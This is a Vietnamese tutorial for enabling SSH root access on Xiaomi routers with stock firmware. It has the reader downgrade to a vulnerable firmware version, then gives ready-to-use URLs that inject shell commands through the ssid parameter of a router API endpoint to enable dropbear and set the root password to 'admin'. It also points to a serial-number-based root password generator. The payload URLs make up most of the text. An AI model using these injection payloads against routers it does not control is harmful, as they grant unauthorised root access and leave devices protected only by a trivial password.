Hướng dẫn mở khoá SSH các loại router Xiaomi trên FW gốc

0. Phiên bản Firmware tồn tại lỗ hổng

1. Downgrade Firmware

• Để OpenSSH, trước tiên phải Hạ cấp FW xuống phiên bản thấp hơn để lợi dụng lỗ hổng của FW.
  • Đăng nhập trang quản lý Router > Downgrade về phiên bản tồn tại lỗ hổng đã nêu ở mục 0
     screenshot

    

    

  • Router sẽ tự reboot sau khi Downgrade

2. OpenSSH

• Sau khi router Reboot, đăng nhập vào lại trang quản lý router. Để ý URL sẽ có dạng
  

  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/web/home#router

• Thay thế token đã copy vào URL tương tự như sau

  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

• Nhấn Enter, màn hình hiện {"code":0} thì tiến hành bước 2.

  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

Đăng nhập SSH với username là root

• Lấy mật khẩu root qua số SN

Nhập vào mã SN có dạng: 12345/A1BC23456 vào trường bên dưới và nhấn Calculate

SN phân biệt chữ HOA chữ thường và không chứa khoảng trắng (dấu cách)

Calculate

Nhấn nút Copy để sao chép Password được tạo.

Copy

• Hoặc chạy URL để đổi mật khẩu root thành admin (root/admin)

  http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

  
  
  

Nguồn tham khảo: https://www.right.com.cn/
Mọi thắc mắc vui lòng để lại bình luận
Chúc các bạn thành công